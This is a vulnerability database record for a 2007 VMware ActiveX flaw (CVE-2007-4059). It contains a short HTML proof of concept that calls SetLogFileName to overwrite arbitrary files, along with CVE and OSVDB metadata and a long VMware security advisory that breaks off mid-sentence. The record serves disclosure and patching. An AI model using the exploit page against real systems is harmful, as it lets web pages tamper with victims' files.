VMware IntraProcessLogging.dll 5.5.3.42958 - Arbitrary Data Write Exploit
2007-07-28T00:00:00
ID EDB-ID:4240 Type exploitdb Reporter callAX Modified 2007-07-28T00:00:00
Description
VMware IntraProcessLogging.dll 5.5.3.42958 Arbitrary Data Write Exploit. CVE-2007-4059. Remote exploit for windows platform
<!--
---------------------------------------------------------------------------
:. GOODFELLAS Security Research TEAM .:
:. http://goodfellas.shellcode.com.ar .:
IntraProcessLogging.dll 5.5.3.42958 VmWare Inc Arbitrary Data Write Exploit
===========================================================================
Internal ID: VULWAR200707280.
-----------
Introduction
------------
IntraProcessLogging.dll is a library included in the Program Vmware from
Vmware Inc. Company.
Tested In
---------
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.
Summary
-------
The SetLogFileName method doesn't check if it's being called from the
application,
or malicious users. Remote Attacker could craft a html page and overwrite
arbitrary
files in a system.
Impact
------
Any computer that uses this Sofware will be exposed to Data Write Arbitrary.
Workaround
----------
- Activate the Kill bit zero in clsid:AF13B07E-28A1-4CAC-9C9A-EC582E354A24
- Unregister IntraProcessLogging.dll using regsvr32.
Timeline
--------
July 28 2007 -- Bug Discovery.
July 28 2007 -- Exploit published.
Credits
-------
* callAX <callAX@shellcode.com.ar>
* GoodFellas Security Research Team <goodfellas.shellcode.com.ar>
Technical Details
-----------------
SetLogFileName method receives one argument filename in this format
"c:\path\file".
Proof of Concept
---------------->
<HTML>
<BODY>
<object id=ctrl classid="clsid:{AF13B07E-28A1-4CAC-9C9A-EC582E354A24}"></object>
<SCRIPT>
function Do_it()
{
File = "c:\\arbitrary_file.txt"
ctrl.SetLogFileName(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Proof of
Concept">
</BODY>
</HTML>
# milw0rm.com [2007-07-28]
{"id": "EDB-ID:4240", "hash": "4c01bf087092d9d8a8c85580a419af7f", "type": "exploitdb", "bulletinFamily": "exploit", "title": "VMware IntraProcessLogging.dll 5.5.3.42958 - Arbitrary Data Write Exploit", "description": "VMware IntraProcessLogging.dll 5.5.3.42958 Arbitrary Data Write Exploit. CVE-2007-4059. Remote exploit for windows platform", "published": "2007-07-28T00:00:00", "modified": "2007-07-28T00:00:00", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4240/", "reporter": "callAX", "references": [], "cvelist": ["CVE-2007-4059"], "lastseen": "2016-01-31T20:27:34", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4059"]}, {"type": "osvdb", "idList": ["OSVDB:40099"]}, {"type": "seebug", "idList": ["SSV:2238"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8174", "SECURITYVULNS:DOC:18039"]}, {"type": "nessus", "idList": ["VMWARE_WS_SERVER_MULTIPLE.NASL", "VMWARE_VMSA-2007-0006.NASL"]}, {"type": "vmware", "idList": ["VMSA-2007-0006"]}], "modified": "2016-01-31T20:27:34"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4240/", "sourceData": "<!--\n---------------------------------------------------------------------------\n\n:. GOODFELLAS Security Research TEAM .:\n:. http://goodfellas.shellcode.com.ar .:\n\nIntraProcessLogging.dll 5.5.3.42958 VmWare Inc Arbitrary Data Write Exploit\n===========================================================================\n\nInternal ID: VULWAR200707280.\n-----------\n\nIntroduction\n------------\nIntraProcessLogging.dll is a library included in the Program Vmware from\nVmware Inc. Company.\n\n\nTested In\n---------\n- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.\n\n\nSummary\n-------\nThe SetLogFileName method doesn't check if it's being called from the\napplication,\nor malicious users. Remote Attacker could craft a html page and overwrite\narbitrary\nfiles in a system.\n\n\nImpact\n------\nAny computer that uses this Sofware will be exposed to Data Write Arbitrary.\n\n\nWorkaround\n----------\n- Activate the Kill bit zero in clsid:AF13B07E-28A1-4CAC-9C9A-EC582E354A24\n- Unregister IntraProcessLogging.dll using regsvr32.\n\n\nTimeline\n--------\nJuly 28 2007 -- Bug Discovery.\nJuly 28 2007 -- Exploit published.\n\n\nCredits\n-------\n * callAX <callAX@shellcode.com.ar>\n * GoodFellas Security Research Team <goodfellas.shellcode.com.ar>\n\n\nTechnical Details\n-----------------\n\nSetLogFileName method receives one argument filename in this format\n\"c:\\path\\file\".\n\n\nProof of Concept\n---------------->\n\n<HTML>\n<BODY>\n <object id=ctrl classid=\"clsid:{AF13B07E-28A1-4CAC-9C9A-EC582E354A24}\"></object>\n\n<SCRIPT>\n\nfunction Do_it()\n {\n File = \"c:\\\\arbitrary_file.txt\"\n ctrl.SetLogFileName(File)\n }\n\n</SCRIPT>\n<input language=JavaScript onclick=Do_it() type=button value=\"Proof of\nConcept\">\n</BODY>\n</HTML>\n\n# milw0rm.com [2007-07-28]\n", "osvdbidlist": ["40099"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:25:27", "bulletinFamily": "NVD", "description": "Absolute path traversal vulnerability in a certain ActiveX control in IntraProcessLogging.dll 5.5.3.42958 in EMC VMware allows remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the SetLogFileName method.", "modified": "2017-09-28T21:29:12", "published": "2007-07-30T13:30:00", "id": "CVE-2007-4059", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4059", "title": "CVE-2007-4059", "type": "cve", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:36", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://www.vmware.com/support/ace/doc/releasenotes_ace.html\nVendor Specific News/Changelog Entry: http://www.vmware.com/support/player/doc/releasenotes_player.html\nVendor Specific News/Changelog Entry: http://www.vmware.com/support/player2/doc/releasenotes_player2.html\nVendor Specific News/Changelog Entry: http://www.vmware.com/support/server/doc/releasenotes_server.html\nVendor Specific News/Changelog Entry: http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html\nVendor Specific News/Changelog Entry: http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html\n[Secunia Advisory ID:26890](https://secuniaresearch.flexerasoftware.com/advisories/26890/)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-09/0356.html\nISS X-Force ID: 35675\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4240\nFrSIRT Advisory: ADV-2007-3229\n[CVE-2007-4059](https://vulners.com/cve/CVE-2007-4059)\nBugtraq ID: 25110\n", "modified": "2007-09-18T13:23:35", "published": "2007-09-18T13:23:35", "href": "https://vulners.com/osvdb/OSVDB:40099", "id": "OSVDB:40099", "title": "VMware Server IntraProcessLogging.dll Remote Arbitrary File Overwrite", "type": "osvdb", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T21:57:33", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 25728,25729,25731,25732\r\nCVE(CAN) ID: CVE-2007-0061,CVE-2007-0062,CVE-2007-0063,CVE-2007-4059,CVE-2007-4155,CVE-2007-4496,CVE-2007-4497\r\n\r\nVMWare\u662f\u4e00\u6b3e\u865a\u62dfPC\u8f6f\u4ef6\uff0c\u5141\u8bb8\u5728\u4e00\u53f0\u673a\u5668\u4e0a\u540c\u65f6\u8fd0\u884c\u4e24\u4e2a\u6216\u591a\u4e2aWindows\u3001DOS\u3001LINUX\u7cfb\u7edf\u3002\r\n\r\nVMWare\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e\uff0c\u53ef\u5bfc\u81f4\u591a\u79cd\u5a01\u80c1\u3002\r\n\r\n\u5177\u4f53\u5982\u4e0b\uff1a\r\n\r\n1) VMWare\u7684DHCP\u670d\u52a1\u5668\u53ef\u88ab\u6076\u610f\u7f51\u9875\u7528\u6765\u83b7\u53d6\u7cfb\u7edf\u6743\u9650\u3002\r\n\r\n2) VMWare\u7684IntraProcessLogging.dll\u548cvielib.dll\u7a0b\u5e8f\u5e93\u53ef\u88ab\u7528\u6765\u8986\u76d6\u7cfb\u7edf\u4e0a\u7684\u4efb\u610f\u6587\u4ef6\u3002\r\n\r\n3) \u865a\u62df\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u5177\u6709\u7ba1\u7406\u6743\u9650\u7684\u7528\u6237\u53ef\u4ee5\u5bfc\u81f4\u4e3b\u673a\u7cfb\u7edf\u4e2d\u7684\u8fdb\u7a0b\u53d1\u751f\u5185\u5b58\u7834\u574f\uff0c\u4ece\u800c\u5728\u4e3b\u673a\u7cfb\u7edf\u4e0a\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\r\n4) \u865a\u62df\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u7684\u7528\u6237\u53ef\u4ee5\u5bfc\u81f4\u4e3b\u673a\u7cfb\u7edf\u4e2d\u7684\u8fdb\u7a0b\u5931\u53bb\u54cd\u5e94\u5f02\u5e38\u9000\u51fa\uff0c\u4ece\u800c\u4f7f\u4e3b\u673a\u7cfb\u7edf\u4e0d\u53ef\u7528\u3002\r\n\r\n5) Workstation\u4f7f\u7528\u672a\u52a0\u5f15\u53f7\u62ec\u8d77\u6765\u7684\u8def\u5f84\u542f\u52a8\u7cfb\u7edf\u670d\u52a1\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u6267\u884c\u6076\u610f\u7a0b\u5e8f\uff0c\u83b7\u5f97\u6743\u9650\u63d0\u5347\u3002\r\n\n\nVMWare Workstation 6.0\n \u76ee\u524d\u5382\u5546\u5df2\u7ecf\u5728\u6700\u65b0\u7248\u672c\u7684\u8f6f\u4ef6\u4e2d\u4fee\u590d\u4e86\u8fd9\u4e9b\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=\"http://www.vmware.com\" target=\"_blank\">http://www.vmware.com</a>", "modified": "2007-09-20T00:00:00", "published": "2007-09-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2238", "id": "SSV:2238", "title": "VMware Workstation 6.0\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "securityvulns": [{"lastseen": "2018-08-31T11:09:27", "bulletinFamily": "software", "description": "Multiple bugs, including remote DHCP server vulnerabilities are fixed.", "modified": "2007-09-21T00:00:00", "published": "2007-09-21T00:00:00", "id": "SECURITYVULNS:VULN:8174", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8174", "title": "VMWare software multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\n- - -------------------------------------------------------------------\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2007-0006\r\nSynopsis: Critical security updates for all supported\r\n versions of VMware ESX Server, VMware Server,\r\n VMware Workstation, VMware ACE, and\r\n VMware Player\r\n\r\nIssue date: 2007-09-18\r\nUpdated on: 2007-09-18\r\n\r\nCVE numbers: CVE-2007-2446 CVE-2007-2447 CVE-2007-0494\r\n CVE-2007-2442 CVE-2007-2443 CVE-2007-2798\r\n CVE-2007-0061 CVE-2007-0062 CVE-2007-0063\r\n CVE-2007-4059 CVE-2007-4155 CVE-2007-4496\r\n CVE-2007-4497 CVE-2007-1856 CVE-2006-1174\r\n CVE-2006-4600 CVE-2004-0813 CVE-2007-1716\r\n CVE-2006-3619 CVE-2006-4146\r\n- - -------------------------------------------------------------------\r\n\r\n1. Summary:\r\n\r\nUpdated versions of all supported hosted products and all ESX 2x\r\nproducts and patches for ESX 30x address critical security updates.\r\n\r\nService Console security updates for samba, bind, krb5, vixie-cron,\r\nshadow-utils, openldap, pam, gcc, and gdb packages.\r\n\r\n2. Relevant releases:\r\n\r\nVMware Workstation 6.0.0\r\nVMware Player 2.0.0\r\nVMware ACE 2.0.0\r\n\r\nVMware Workstation prior to 5.5.5\r\nVMware Player prior to 1.0.5\r\nVMware Server prior to 1.0.4\r\nVMware ACE prior to 1.0.4\r\n\r\nVMware ESX 3.0.2 without patches ESX-1001725 ESX-1001731 ESX-1001726\r\n ESX-1001727 ESX-1001728 ESX-1001729\r\n ESX-1001730\r\n\r\nVMware ESX 3.0.1 without patches ESX-8258730 ESX-1001213 ESX-1001691\r\n ESX-1001723 ESX-1001214 ESX-1001692\r\n ESX-1001693 ESX-1001694 ESX-8253547\r\n ESX-8567382\r\n\r\nVMware ESX 3.0.0 without patches ESX-4809553 ESX-1001204 ESX-1001206\r\n ESX-1001212 ESX-1001205 ESX-1001207\r\n ESX-1001208 ESX-1001209 ESX-1001210\r\n ESX-1001211\r\n\r\nVMware ESX 2.5.4 prior to upgrade patch 10 (Build# 53326)\r\nVMware ESX 2.5.3 prior to upgrade patch 13 (Build# 52488)\r\nVMware ESX 2.1.3 prior to upgrade patch 8 (Build# 53228)\r\nVMware ESX 2.0.2 prior to upgrade patch 8 (Build# 52650)\r\n\r\n3. Problem description:\r\n\r\nProblems addressed by these patches:\r\n\r\nI Arbitrary code execution and denial of service vulnerabilities\r\n\r\n This release fixes a security vulnerability that could allow a\r\n guest operating system user with administrative privileges to cause\r\n memory corruption in a host process, and thus potentially execute\r\n arbitrary code on the host. (CVE-2007-4496)\r\n\r\n This release fixes a denial of service vulnerability that could\r\n allow a guest operating system to cause a host process to become\r\n unresponsive or exit unexpectedly. (CVE-2007-4497)\r\n\r\n Thanks to Rafal Wojtczvk of McAfee for identifying and reporting\r\n these issues.\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-8258730\r\n http://www.vmware.com/support/vi3/doc/esx-8258730-patch.html\r\n md5sum a06d0e36e403b0fe6bc6fbc76220a86d\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-4809553\r\n http://www.vmware.com/support/vi3/doc/esx-4809553-patch.html\r\n md5sum cd363526aab5fa6c45bf2509cb5ae500\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life (10/05/2007) users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available.\r\n\r\n VMware ESX 2.5.4 upgrade to patch 10 (Build# 53326)\r\n VMware ESX 2.5.3 upgrade to patch 13 (Build# 52488)\r\n VMware ESX 2.1.3 upgrade to patch 8 (Build# 53228)\r\n VMware ESX 2.0.2 upgrade to patch 8 (Build# 52650)\r\n\r\n NOTE: ESX 3.0.2 is not affected by this issue\r\n\r\n Hosted products\r\n ---------------\r\n VMware Workstation 6.0.0 upgrade to version 6.0.1 (Build# 55017)\r\n VMware Workstation 5.5.4 upgrade to version 5.5.5 (Build# 56455)\r\n VMware Player 2.0.0 upgrade to version 2.0.1 (Build# 55017)\r\n VMware Player 1.0.4 upgrade to version 1.0.5 (Build# 56455)\r\n VMware Server 1.0.3 upgrade to version 1.0.4 (Build# 56528)\r\n VMware ACE 2.0.0 upgrade to version 2.0.1 (Build# 55017)\r\n VMware ACE 1.0.3 upgrade to version 1.0.4 (Build# 54075)\r\n\r\nII Hosted products DHCP security vulnerabilities addressed\r\n\r\n This release fixes several vulnerabilities in the DHCP server\r\n that could enable a specially crafted packets to gain system-level\r\n privileges. (CVE-2007-0061, CVE-2007-0062, CVE-2007-0063)\r\n\r\n Thanks to Neel Mehta and Ryan Smith of the IBM Internet Security\r\n Systems X-Force for discovering and researching these\r\n vulnerabilities.\r\n\r\n Hosted products\r\n ---------------\r\n VMware Workstation 6.0.0 upgrade to version 6.0.1 (Build# 55017)\r\n VMware Workstation 5.5.4 upgrade to version 5.5.5 (Build# 56455)\r\n VMware Player 2.0.0 upgrade to version 2.0.1 (Build# 55017)\r\n VMware Player 1.0.4 upgrade to version 1.0.5 (Build# 56455)\r\n VMware Server 1.0.3 upgrade to version 1.0.4 (Build# 56528)\r\n VMware ACE 2.0.0 upgrade to version 2.0.1 (Build# 55017)\r\n VMware ACE 1.0.3 upgrade to version 1.0.4 (Build# 54075)\r\n\r\nIII Windows based hosted product vulnerability in\r\n IntraProcessLogging.dll and vielib.dll.\r\n\r\n This release fixes a security vulnerability that could allow a\r\n malicious remote user to exploit the library file\r\n IntraProcessLogging.dll to overwrite files in a system.\r\n (CVE-2007-4059)\r\n\r\n This release fixes a security vulnerability that could allow a\r\n malicious remote user to exploit the library file vielib.dll to\r\n overwrite files in a system. (CVE-2007-4155)\r\n\r\n Thanks to the Goodfellas Security Research Team for discovering and\r\n researching these vulnerabilities.\r\n\r\n Hosted products\r\n ---------------\r\n VMware Workstation 6.0.0 upgrade to version 6.0.1 (Build# 55017)\r\n VMware Workstation 5.5.4 upgrade to version 5.5.5 (Build# 56455)\r\n VMware Player 2.0.0 upgrade to version 2.0.1 (Build# 55017)\r\n VMware Player 1.0.4 upgrade to version 1.0.5 (Build# 56455)\r\n VMware Server 1.0.3 upgrade to version 1.0.4 (Build# 56528)\r\n VMware ACE 2.0.0 upgrade to version 2.0.1 (Build# 55017)\r\n VMware ACE 1.0.3 upgrade to version 1.0.4 (Build# 54075)\r\n\r\n\r\nIV Escalation of privileges on Windows hosted systems\r\n\r\n This release fixes a security vulnerability in which Workstation\r\n was starting registered Windows services in an insecure manner.\r\n This vulnerability could allow a malicious user to escalate user\r\n privileges.\r\n\r\n Thanks to Foundstone for discovering this vulnerability.\r\n\r\n Hosted products\r\n ---------------\r\n VMware Workstation 6.0.0 upgrade to version 6.0.1 (Build# 55017)\r\n VMware Workstation 5.5.4 upgrade to version 5.5.5 (Build# 56455)\r\n VMware Player 2.0.0 upgrade to version 2.0.1 (Build# 55017)\r\n VMware Player 1.0.4 upgrade to version 1.0.5 (Build# 56455)\r\n VMware Server 1.0.3 upgrade to version 1.0.4 (Build# 56528)\r\n VMware ACE 2.0.0 upgrade to version 2.0.1 (Build# 55017)\r\n VMware ACE 1.0.3 upgrade to version 1.0.4 (Build# 54075)\r\n\r\nV Potential denial of service using VMware Player\r\n\r\n This release fixes a problem that prevented VMware Player from\r\n launching. This problem was accompanied by the error message VMware\r\n Player unrecoverable error: (player) Exception 0xc0000005 (access\r\n violation) has occurred.\r\n\r\n Hosted products\r\n ---------------\r\n VMware Player 2.0.0 upgrade to version 2.0.1 (Build# 55017)\r\n VMware Player 1.0.4 upgrade to version 1.0.5 (Build# 56455)\r\n\r\nVI ESX Service Console updates\r\n\r\na. Service console package Samba, has been updated to address the\r\n following issues:\r\n\r\n Various bugs were found in NDR parsing, used to decode MS-RPC\r\n requests in Samba. A remote attacker could have sent carefully\r\n crafted requests causing a heap overflow, which may have led to the\r\n ability to execute arbitrary code on the server. (CVE-2007-2446)\r\n\r\n Unescaped user input parameters were being passed as arguments to\r\n /bin/sh. A remote, authenticated, user could have triggered this\r\n flaw and executed arbitrary code on the server. Additionally, this\r\n flaw could be triggered by a remote unauthenticated user if Samba\r\n was configured to use the non-default username map script option.\r\n (CVE-2007-2447)\r\n\r\n Thanks to the Samba developers, TippingPoint, and iDefense for\r\n identifying and reporting these issues.\r\n\r\n Note: These issues only affect the service console network, and are\r\n not remote vulnerabilities for ESX Server hosts that have been set\r\n up with the security best practices provided by VMware.\r\n http://www.vmware.com/resources/techresources/726\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001213\r\n http://www.vmware.com/support/vi3/doc/esx-1001213-patch.html\r\n md5sum 4e942e5b47f90654696910fb8b10b144\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001204\r\n http://www.vmware.com/support/vi3/doc/esx-1001204-patch.html\r\n md5sum 08bfdec038ea900c72f04e8d50b2db62\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life (10/05/2007) users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\n VMware ESX 2.5.4 prior to upgrade patch 10 (Build# 53326)\r\n VMware ESX 2.5.3 prior to upgrade patch 13 (Build# 52488)\r\n VMware ESX 2.1.3 prior to upgrade patch 8 (Build# 53228)\r\n VMware ESX 2.0.2 prior to upgrade patch 8 (Build# 52650)\r\n\r\n NOTE: ESX 3.0.2 is not affected by this issue\r\n\r\nb. Updated bind package for the service console fixes a flaw with the\r\n way ISC BIND processed certain DNS query responses.\r\n\r\n ISC BIND (Berkeley Internet Name Domain) is an implementation of\r\n the DNS (Domain Name System) protocols. Under some circumstances, a\r\n malicious remote user could launch a Denial-of-Service attack on\r\n ESX Server hosts that had enabled DNSSEC validation.\r\n (CVE-2007-0494)\r\n\r\n Note: These issues only affect the service console network, and are\r\n not remote vulnerabilities for ESX Server hosts that have been set\r\n up with the security best practices provided by VMware.\r\n http://www.vmware.com/resources/techresources/726\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001725\r\n http://www.vmware.com/support/vi3/doc/esx-1001725-patch.html\r\n md5sum 75aa49eecec2e84eb41a4c26683d4c7a\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001691\r\n http://www.vmware.com/support/vi3/doc/esx-1001691-patch.html\r\n md5sum e288a71c4953aa6724ce53879c663f81\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001206\r\n http://www.vmware.com/support/vi3/doc/esx-1001206-patch.html\r\n md5sum bd552eb70624164067039525941ce82a\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life (10/05/2007) users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\n VMware ESX 2.5.4 prior to upgrade patch 10 (Build# 53326)\r\n VMware ESX 2.5.3 prior to upgrade patch 13 (Build# 52488)\r\n VMware ESX 2.1.3 prior to upgrade patch 8 (Build# 53228)\r\n VMware ESX 2.0.2 prior to upgrade patch 8 (Build# 52650)\r\n\r\nc. This patch provides updated service console package krb5 update.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n assigned the names CVE-2007-2442, CVE-2007-2443, and CVE-2007-2798\r\n to these security issues.\r\n\r\n Thanks to Wei Wang of McAfee Avert Labs discovered these\r\n vulnerabilities.\r\n\r\n Note: The VMware service console does not provide the kadmind\r\n binary, and is not affected by these issues, but a update has been\r\n provided for completeness.\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001731\r\n http://www.vmware.com/support/vi3/doc/esx-1001731-patch.html\r\n md5sum c349b83065f5b06cee34bae90a5a01b3\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001723\r\n http://www.vmware.com/support/vi3/doc/esx-1001723-patch.html\r\n md5sum 9a31d1718d6c063cf978305b84637c40\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001212\r\n http://www.vmware.com/support/vi3/doc/esx-1001212-patch.html\r\n md5sum 2bc08369d3410fa59d353e45830ae9f5\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life (10/05/2007) users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\n VMware ESX 2.5.4 prior to upgrade patch 10 (Build# 53326)\r\n VMware ESX 2.5.3 prior to upgrade patch 13 (Build# 52488)\r\n VMware ESX 2.1.3 prior to upgrade patch 8 (Build# 53228)\r\n VMware ESX 2.0.2 prior to upgrade patch 8 (Build# 52650)\r\n\r\nd. Service console update for vixie-cron\r\n\r\n This patch provides an updated service console package vixie-cron.\r\n Cron is a standard UNIX daemon that runs specified programs at\r\n scheduled times.\r\n\r\n A denial of service issue was found in the way vixie-cron verified\r\n crontab file integrity. A local user with the ability to create a\r\n hardlink to /etc/crontab could potentially prevent vixie-cron from\r\n executing certain system cron jobs. (CVE-2007-1856)\r\n\r\n Thanks to Raphael Marichez for identifying this issue.\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001214\r\n http://www.vmware.com/support/vi3/doc/esx-1001214-patch.html\r\n md5sum 1e63db1cc7605830b16306a35bccd878\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001205\r\n http://www.vmware.com/support/vi3/doc/esx-1001205-patch.html\r\n md5sum e6b818cf885d5fd5f93d33b27051df83\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life (10/05/2007) users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\n NOTE: ESX 3.0.2 and ESX 2.x are not affected by this issue.\r\n\r\ne. Service console update for shadow-utils\r\n\r\n This patch provides an updated shadow-utils package. A new\r\n user's mailbox, when created, could have random permissions for a\r\n short period. This could enable a local malicious user to\r\n read or modify the mailbox. (CVE-2006-1174)\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001726\r\n http://www.vmware.com/support/vi3/doc/esx-1001726-patch.html\r\n md5sum ac55c65ddc2142a292648765e9dcb583\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001692\r\n http://www.vmware.com/support/vi3/doc/esx-1001692-patch.html\r\n md5sum 27edbac467107cc1fe6c78a839ce2144\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001207\r\n http://www.vmware.com/support/vi3/doc/esx-1001207-patch.html\r\n md5sum acad9bce49ac9398ab1ee502980b49cb\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life (10/05/2007) users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\nf. Service console update for OpenLDAP\r\n\r\n This patch provides a updated OpenLDAP package. A flaw could\r\n allow users with selfwrite access to modify the distinguished\r\n name of any user, instead of being limited to modify only\r\n their own distinguished name. (CVE-2006-4600)\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001727\r\n http://www.vmware.com/support/vi3/doc/esx-1001727-patch.html\r\n md5sum bd137cbf65b20dae3aaf422a559f92a1\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001693\r\n http://www.vmware.com/support/vi3/doc/esx-1001693-patch.html\r\n md5sum a11191b59761b6afb68ea73e9e6456d0\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001208\r\n http://www.vmware.com/support/vi3/doc/esx-1001208-patch.html\r\n md5sum f3e26b66682191e024a9b094a063837f\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life (10/05/2007) users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\n NOTE: ESX 2.x doesen't ship OpenLDAP\r\n\r\ng. Service console update for PAM\r\n\r\n This patch provides an updated PAM package A vulnerability was\r\n found that could allow console users with access to certain device\r\n files to cause damage to recordable CD drives. Certain file\r\n permissions have now been modified to disallow access.\r\n (CVE-2004-0813)\r\n\r\n A flaw was found with console device permissions. It was possible\r\n for various console devices to retain ownership of the previoius\r\n console user after logging out, which could result in leakage of\r\n information to an unauthorized user. (CVE-2007-1716)\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001728\r\n http://www.vmware.com/support/vi3/doc/esx-1001728-patch.html\r\n md5sum a33f0cc5b1cfc68683c4d8643c52775c\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001694\r\n http://www.vmware.com/support/vi3/doc/esx-1001694-patch.html\r\n md5sum 6ce5d882d6fe9e714ce48f719cefb182\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001209\r\n http://www.vmware.com/support/vi3/doc/esx-1001209-patch.html\r\n md5sum 1c7adad00a20f9e7ba1fbe1663ad4d66\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life (10/05/2007) users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\nh. Service console update for GCC\r\n\r\n This patch provides security fixes for the service console GNU\r\n Compiler Collection (GCC) packages that include C, C++, Java,\r\n Fortran 77, Objective C, and Ada 95 GNU compilers and related\r\n support libraries.\r\n\r\n A flaw was found in the fastjar utility that could potentially\r\n allow a malicious user to create a JAR file which, if unpacked\r\n using fastjar, could write to any file that an authorized user had\r\n write access to. (CVE-2006-3619)\r\n\r\n Thanks to Jürgen Weigert for identifying this issue.\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001729\r\n http://www.vmware.com/support/vi3/doc/esx-1001729-patch.html\r\n md5sum 1b2d32dc805971703bb2c8c047c6144a\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-8253547\r\n http://www.vmware.com/support/vi3/doc/esx-8253547-patch.html\r\n md5sum 90702b54fb6197a6680f141ad8c435fa\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001210\r\n http://www.vmware.com/support/vi3/doc/esx-1001210-patch.html\r\n md5sum c1fb76ac529966bf65cc98cc5e5e88bb\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life (10/05/2007) users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\ni. Service Console update for GDB\r\n\r\n This patch provides a security fix for the service console 